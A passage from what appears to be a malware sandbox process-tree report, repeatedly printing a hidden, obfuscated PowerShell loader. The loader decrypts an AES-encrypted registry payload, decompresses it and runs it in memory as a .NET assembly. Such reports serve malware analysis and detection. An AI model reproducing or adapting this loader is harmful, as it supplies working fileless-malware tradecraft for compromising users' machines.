'')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        23⤵
        
        PID:8472
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6016).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        23⤵
        
        PID:9068
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6016).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        23⤵
        
        PID:5044
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6016).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        23⤵
        
        PID:7716
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6016" "3080" "3024" "3084" "0" "0" "3088" "0" "0" "0" "0" "0"
        23⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:8960
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8804" "3092" "3020" "3096" "0" "0" "3100" "0" "0" "0" "0" "0"
        22⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5224
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5228).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 